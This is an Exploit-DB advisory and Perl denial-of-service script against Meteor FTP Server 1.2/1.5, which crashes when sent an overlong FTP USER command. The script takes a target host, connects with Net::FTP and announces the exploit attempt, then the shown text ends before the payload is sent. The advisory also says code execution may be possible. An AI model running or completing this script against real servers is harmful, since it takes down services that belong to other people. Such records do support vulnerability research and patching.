Meteor FTP Server 1.2/1.5 USER Memory Corruption Vulnerability

ID EDB-ID:22999
Type exploitdb
Reporter zerash
Modified 2003-08-08T00:00:00


Meteor FTP Server 1.2/1.5 USER Memory Corruption Vulnerability. Dos exploit for windows platform


Meteor FTP Server is prone to a memory corruption vulnerability that can be triggered by a malicious client via an overly value for the FTP USER command. This could be exploited to cause a server crash.

Further reports indicate that this may likely also be exploited to execute arbitrary code in the context of the affected server.

# - Remote denial of service against Meteor FTP Version 1.5
# A vulnerability has been identified in Meteor FTP Version 1.5, which
# allows malicious users to remotely crash the ftpd. By connecting to the 
# ftpd and issuing USER followed by large amounts of data, the server 
# crashes. For more info, go to : 
# Usage : ./ <host/ip>
# Vulnerability & code by zerash
# Contact :

use Net::FTP;
$host = $ARGV[0];

if("$ARGV[0]" eq "") {
	print("DoS against Meteor FTP Version 1.5 by zerash\\n");
	die("Usage : ./meteorftpdos <host\/ip>\n");
} else {	
	print("Connecting to $host...\n");
	my $ftp = Net::FTP->new($host) or die "Couldn't connect to $host\n";
	print("Attempting to exploit the ftpd...");